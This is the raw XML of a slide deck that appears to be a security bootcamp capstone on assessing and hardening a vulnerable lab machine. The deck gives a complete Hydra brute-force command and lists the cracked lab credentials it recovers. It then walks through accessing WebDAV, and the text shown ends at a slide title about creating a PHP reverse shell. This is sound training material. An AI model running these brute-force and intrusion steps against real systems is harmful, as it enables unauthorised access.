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 id="2147483727" r:id="rId2"/>
    <p:sldMasterId id="2147483728"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79" r:id="rId13"/>
    <p:sldId id="280" r:id="rId14"/>
    <p:sldId id="281" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="283" r:id="rId17"/>
    <p:sldId id="284" r:id="rId18"/>
    <p:sldId id="265" r:id="rId19"/>
    <p:sldId id="266" r:id="rId20"/>
    <p:sldId id="267" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="286" r:id="rId23"/>
    <p:sldId id="268" r:id="rId24"/>
    <p:sldId id="287" r:id="rId25"/>
    <p:sldId id="270" r:id="rId26"/>
    <p:sldId id="271" r:id="rId27"/>
    <p:sldId id="272" r:id="rId28"/>
    <p:sldId id="273" r:id="rId29"/>
    <p:sldId id="274" r:id="rId30"/>
    <p:sldId id="275" r:id="rId31"/>
    <p:sldId id="276" r:id="rId32"/>
    <p:sldId id="277" r:id="rId33"/>
    <p:sldId id="278" r:id="rId34"/>
  </p:sldIdLst>
  <p:sldSz cx="24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Amatic SC" panose="020B0604020202020204" charset="-79"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34"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Inconsolata" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId52"/>
      <p:bold r:id="rId53"/>
      <p:italic r:id="rId54"/>
      <p:boldItalic r:id="rId55"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId56"/>
      <p:bold r:id="rId57"/>
      <p:italic r:id="rId58"/>
      <p:boldItalic r:id="rId59"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId60"/>
      <p:bold r:id="rId61"/>
      <p:italic r:id="rId62"/>
      <p:boldItalic r:id="rId63"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
      <p:italic r:id="rId66"/>
      <p:boldItalic r:id="rId67"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId68"/>
      <p:bold r:id="rId69"/>
      <p:italic r:id="rId70"/>
      <p:boldItalic r:id="rId71"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId72"/>
      <p:bold r:id="rId73"/>
      <p:italic r:id="rId74"/>
      <p:boldItalic r:id="rId75"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"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D82A68-96A6-43CD-8B4E-EC5E3386A180}">
  <a:tblStyle styleId="{29D82A68-96A6-43CD-8B4E-EC5E3386A1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38" y="115"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="958"/>
        <p:guide orient="horz" pos="8160"/>
        <p:guide orient="horz" pos="480"/>
        <p:guide pos="14398"/>
        <p:guide orient="horz" pos="3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font" Target="fonts/font2.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font18.fntdata"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font23.fntdata"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font39.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font44.fntdata"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font26.fntdata"/><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77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font42.fntdata"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font37.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75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font4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font" Target="fonts/font38.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font43.fntdata"/><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font" Target="fonts/font15.fntdata"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font20.fntdata"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font41.fntdata"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId71"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font" Target="fonts/font5.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font10.fntdata"/><Relationship Id="rId66"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80931de627_1_5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80931de627_1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878cffff84_0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3" name="Google Shape;1383;g878cffff84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80931de627_1_5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80931de627_1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80931de627_1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80931de627_1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0931de627_1_7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0931de627_1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80931de627_1_8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80931de627_1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80931de627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3" name="Google Shape;1423;g80931de627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80931de627_1_9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80931de627_1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80931de627_1_9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80931de627_1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80931de627_1_10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80931de627_1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6" name="Google Shape;1316;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80931de627_1_11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9" name="Google Shape;1449;g80931de627_1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80931de627_1_11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80931de627_1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878cffff84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3" name="Google Shape;1463;g878cffff84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7126a210c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8" name="Google Shape;1328;g7126a210c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878cffff84_0_2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878cffff84_0_2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latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>TODO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Create a diagram of the network on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://draw.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Save your diagram in the whitespace above, and fill out the data in the right sidebar.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08f95a6bd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1" name="Google Shape;1341;g808f95a6bd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808f95a6bd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808f95a6bd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80931de627_1_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80931de627_1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80931de627_1_2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80931de627_1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80931de627_1_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80931de627_1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3.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192.168.1.105/company_folders/secret_folder/connect_to_corp_server" TargetMode="Externa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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1310" name="Google Shape;1310;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632102" y="4219003"/>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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Capstone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Assessment, Analysis &amp; Hardening of a Vulnerable System</a:t>
            </a:r>
            <a:endParaRPr sz="6800" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1311" name="Google Shape;1311;p82"/>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1312" name="Google Shape;1312;p82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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71D2-E2EA-4A87-B1B9-74DB62DEAE85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute Force Attack </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78D6CAD-92FB-4807-8802-DB00E221D0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Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37CAC7E2-F16A-43F0-8A96-05D6F3BB43B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1924051"/>
            <a:ext cx="24377700" cy="9879556"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Because the folder is password protected, we need to either guess the password or brute force into the directory. In this case, it would be much more efficient to use a brute force attack, specifically Hydra, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using the command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt -s 80 -f -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 192.168.1.105 http-get  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D628BE4-8FC0-407A-B1AC-02401DBF8033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197865" y="4325112"/>
            <a:ext cx="13755736" cy="8677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E409C777-1DEF-4C39-8EB1-F6FCD04D8870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15124176" y="4325112"/>
            <a:ext cx="8055609" cy="3077766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> finishes, We'll find the username is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and the password is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leopoldo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="287807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8C443-5D87-4DCC-9035-C05A51A3604C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting Access to the Secret Folder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{243E9BA5-CB59-4EE0-A174-1E0DCA4B2C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Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E52F88D-E111-48DE-A2F6-FAFF4A7C4549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1809750"/>
            <a:ext cx="24377700" cy="11274017"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Going back to the web browser and use the credentials obtained in Brute Force attack to log in. We have the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file. Located inside of the file are instructions on how to connect to the WebDAV directory, as well the user's username and hashed password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88A129B5-1231-4EDC-A397-29E4B3154E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1057275" y="3590925"/>
            <a:ext cx="15678150" cy="9353550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD6C58C7-3A37-4779-BC37-3045F30FCE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16840200" y="3705225"/>
            <a:ext cx="7315200" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Here, we simply used Crack Station to reveal the hashed password : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1656021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C6335-A7F6-4668-A56F-7E20FC4228E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connect to the target machine via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883C7895-A941-4A7A-86C9-5809999114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Subtitle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84FCBAA2-38A6-47DF-8124-429D7D3463D6}"/>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394B337A-34DE-498A-A529-27039DCAC7A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="1771650"/>
            <a:ext cx="24377700" cy="11312117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to connect to target machine via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> We need to do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o	Opening the File System from the Kali machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o	Click Browse Network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o	In the URL bar we need to navigate through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> such as : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>dav://192.168.1.105/webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and by using the credentials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ryan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>linux4u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to log in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D18D74EE-2754-4D6B-831A-4D5A1DEEED90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234122" y="4899469"/>
            <a:ext cx="12984798" cy="7777414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="191362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A066-99B5-4538-8449-2DDCD38206BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating PHP reverse shell payload</a:t>
            </a:r>
          </a:p>
